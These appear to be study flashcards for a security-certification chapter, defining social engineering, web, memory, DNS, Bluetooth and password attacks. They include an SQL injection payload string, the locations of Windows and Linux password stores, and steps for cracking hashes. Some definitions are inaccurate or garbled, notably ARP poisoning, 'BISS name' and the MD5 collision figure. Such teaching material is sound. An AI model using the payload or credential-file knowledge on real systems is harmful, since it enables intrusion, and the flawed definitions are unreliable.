Threats, Vulnerabilities And Mitigation (Chapter 2) Flashcards
Advanced Persistent Threats
Is a sophisticated, well funded group that uses multiple attack vectors to gain access to a network and remain undetected for as long as possible with the end goal of steal data/assets
Shadow IT
The use of unauthorized or unapproved IT resources within an organisation, that can unintentionally introduce vulnerabilities
Threat Vector
Is the path in which a cyber criminal uses to attack a vulnerability
Attack surface
The total number of all possible entry point (threat Vector) for unauthorized access into the network
Social engineering
Is the psychological manipulation of people into divulging confidential information or performing actions they shouldn’t do
Phishing
Sending fake emails to a large group of people with the intention of one of the recipients opening a malicious attachment or opening a malicious link
Spear phishing
Is a phishing attack that is targeted to a specific group
Whaling
A phishing attack that is targeting to a high value individual such as a CEO
Vishing
A phishing attack that uses pre-recorded voice messages to pressure a user
Tailgating
Is when an authorised individual follows someone into an area they are not authorised to be in without the consent of the authorised individual
Piggybacking
Is when an unauthorized individual follows someone into an area with the consent of the authorised person
Email account compromised
An attacker sends a email messages that appears to come from a known source and making a legitimate request, but instead hold malicious links/attachments
Smishing
Is a phishing attack that uses SMS or social media
Water-holing
An attack that entices users with a common interest to visit a malicious website
Pharming
Redirects a user to a bogus website that mimics the appearance of a legitimate one
Misinformation/disinformation
The spread of false information to deceive people used for political, military or commercial goals
Typosquatting
Is a fake domain name that is very similar to a legitimate websites domain name, the fake domain will direct the user to a malicious site
Baiting
An online attack that promises the victim a reward
Shoulder surfing
An unauthorized person spies over the user shoulder to see what they are typing
Dumpster diving
Going through someone’s trash
Password Cracking
A local it remote password cracking attack that uses dictionary/brute force/rainbow table or pass the hash to gain access to a users account
-it targets security misconfiguration for authentication
Remote Code Execution
Any conditions in which an attacker can execute arbitrary code across a network
- generally made possible due to lack of input validation/sanitisation or bounds checking
Buffer/ heap overflow
A programming error which allows attackers to overwrite allocated memory addresses with malicious code
- made possible via lack of bounds checking, the memory that is allocated for the user input is overloaded resulting in memory “leaking” into other addresses where malicious code can be injected and executed
Memory Corruption
A programming error that allows attackers to access a programs memory space and hijack the normal execution flow.
- made possible by programming errors
Privilege escalation
Any conditions which allows attackers to gain elevated access to a compromise system
- made possible by programming error/misconfiguration/insufficient access control
Information disclosure
Any conditions that allows attackers to gain access to protected information
- made possible by misconfiguration/insufficient access control
Security feature bypass
A software weakness that allows attackers to circumvent policies, filters, input validation or other security safeguarding
- made possible by programming error or lack of compensation controls
Directory traversal
Any condition that allows attackers to access restricted areas of a file system
- made possible by insufficient access control particularly on the file system
Denial of service
Any conditions that allows an attacker to consume system or network resources so that legitimate requests can’t be served
- made possible by insufficient network controls to block or divert malicious traffic or by unpatched/misconfigured systems
Insider threats
Unintentional or malicious activity from users, administrator and advanced Persistent threats (APT)
- made possible by insufficient administrative, technical or physical controls
Physical attack
Booting the device from a different OS (such as on a usb drive) to access the targeted OS file system
- made possible by insufficient physical controls protecting the device
Windows unquoted service path
A form of privilege escalation attack that uses a vulnerability in the way windows searches for and starts application.
It taking advantage of windows file system paths that contain spaces and windows ability to launch executables without requiring file extensions
- a malicious executable would be created that uses the first word of a folders name that includes spaces. Windows would then go through the path to reach the end application but would end up running the malicious executable.
Memory Injections
Is an attack that happens when unauthorized external code is executed within an authorized process by hijacking the memory that the authorized code is using, by substituting a legitimate DLL with a malicious one, injecting shell code using a buffer overflow or process hollowing
Buffer
A temporary storage location in RAM allocated to an application.
Buffer Overflow
A condition in which the incoming data exceeds the size of the space allocated for it in RAM (buffer) and the data is overflowed into buffers used for other apps. The overflow data can contain malicious code that could be run by other apps
Buffer Overflow prevention
Programmers set an input limit (bounds checking) for functions that accepts incoming data
Out of sequence Threads
Multiple CPU threads can be executed at the same time or scheduled to be executed after one another(thread scheduler), if a thread ends up finishing before the scheduler expected it to finish there is an opportunity for malicious code to hijack the remaining time and be executed
Race conditions
A programming/application error that occurs when two or more processes/threads try to access and change shared data at the same time, typical caused by delays in Time-of-check (TOC) and Time-of-Use (TOU)
Web Application
Is any executable that runs on the web server that dynamically builds, modified and populated web pages
Unsanitized Input
Most common web app vulnerability that is caused due to not having an input filter for inappropriate user input.
Not having an input filter can allow code to be slipped into the input field, which the interpreter would assume is just another line of code to be executed
SQL Injections (SQLi)
Most common type of web app attack that takes advantage of insufficient input validation to enter malicious SQL commands for the database server
Most common SQLi command:
’ or 1=1–;
Cross-site Scripting (XSS)
An effective attack that exploits a client’s trust in a server. Malicious code is injected into a webpage and is executed when the webpage is loaded.
Occurs when we apps doesn’t have sufficient user input validation, which would allow HTML code to be inputted and run
Cross-site Request Forgery (CSRF)
Exploits a servers trust in a client by taking advantage of a browsers implicit authorization to perform tasks for an authenticated user.
- The browser keeps a user authenticated to a website, an attacker sends a malicious link (via phishing) that the user opens, the link contains malicious code which accesses the users authenticated account for the webpage and executes unwanted action in the background
Jailbreaking/Rooting
The process of removing restrictions imposed by the manufacturer on a mobile device to allow the user to sideload apps, modify system settings or access root privileges
Man-in-the-Middle Attack
An attack that acts as a relay between the victim and the server that they are attempting to reach. Often stealing data.
- ARP poisoning (multiple devices have same MAC address)
- Poisoned MAC Address table on switch (making the switch forward data to the wrong device)
Credentials Replay Attack
An attack that involves eavesdropping (Man in the middle) on a network to intercept data packets that contains cookie or session tokens, which would allow the attacker to start another session with the use of the stolen cookie or session token
DNS attack (as a victim)
-
DNS Flood Attack
– an attack that deploys valid DNS request at an extremely high packet rate from a massive group of IP address (DDoS) -
NXDOMAIN Attack
– an attack that overwhelmed the DNS server by using large volume of request for invalid records
DNS Amplification
- type of DDoS attack that request multiple DNS servers to send all DNS records to a target.
A simple DNS request is about 60 Bytes a request for all records from a single DNS server can be 4000+ bytes (70:1 amplification)
Reflection Attack
A type of DDoS attack that an attacker spoofs a victims IP address, using their IP address to send query or pings to multiple intermediary machines (DNS server) that all response at the same time to the victims machine, overwhelming it
DNS Cache Poisoning
False DNS Records are inserted into a DNS servers Cache, thus clients get redirected to malicious sites.
- DNS server share information with eachother to resolve host names which could result in multiple DNS servers recieving false records
Evil Twin
Is a malicious wireless access point that is set up with the same BISS name as a legitimate access point with the intention of having users connect to the malicious access point that can then be used to eavesdrop on the sessions
Bluetooth Attack types
Bluesmacking
- denial of service against devices
Bluejacking
- sending unsolicited messages
Bluesniffing
- attempting to discover Bluetooth devices
Bluebugging
- Remotely using a devices features
Bluesnarfing
- theft of data from a devices
Blueprinting
- collecting device info over Bluetooth
HelloMoto
- attacker connects to headset of a Motorola device without authentication
Car whisperer
- connecting to Bluetooth radio of nearby car using default pins
BLUFFS
- exposes device to adversary-in-the-middle attack
Birthday attack
A common implementation of a collision attack that is based on the ‘birthday paradox’ (in a room of 23 people there is a 50% chance that two share the same birthday), birthday attack takes advantage of the statistical property by trying to find two different input messages that produces the same hash value.
MD5 takes about 10000 hashes to find a collision
Hash Collision
Occurs when a hashing algorithm produces the same hash for different input values, which could allow an attacker to pass either of the hash inputs as the authorized one
Physical Password Attack
Password cracking by having physical access to the device can be done by booting up an OS via a USB and accessing the password file of the original OS, or by overwriting the area that stores the passwords.
Where are password store?
windows
- Security Account Manager (SAM)
C:\Windows\System32\config
- BitLocker disk encryption
Active Directory
- C:\Windows\NTDS\
Linux
-root\etc\shadow
- contains only password hash
- \etc\password file contains associated usernames
Password Hash cracking
1) Obtain password hashes
2) Determine Hash algorithm
3) hash each expected password (password dictionary) with the same algorithm
4) compared results to the stored hash
5) if hashes match you found password
Dictionary Attack
Is a password attack that uses a large list of words that are commonly used as passwords to attempt to brute force the password credentials of a user.
- User name needs to be known
- potential system lock out from multiple attempts
Rainbow Table
A password attack that uses a list of pre-hashed common password in multiple algorithm.
Password Spraying
A variant of brute forcing that uses the same password for multiple different user names.
- used to circumvent account lockout
Credentials Stuffing
A variant of brute forcing that uses known-good credentials to attempt login as the user across multiple sites
Pass-the-hash
A network based attack that grabs the hash of a user by performing a hash dump on the network.
Once the password hash and the user name is obtained then both can be passed to a tool to attempt login
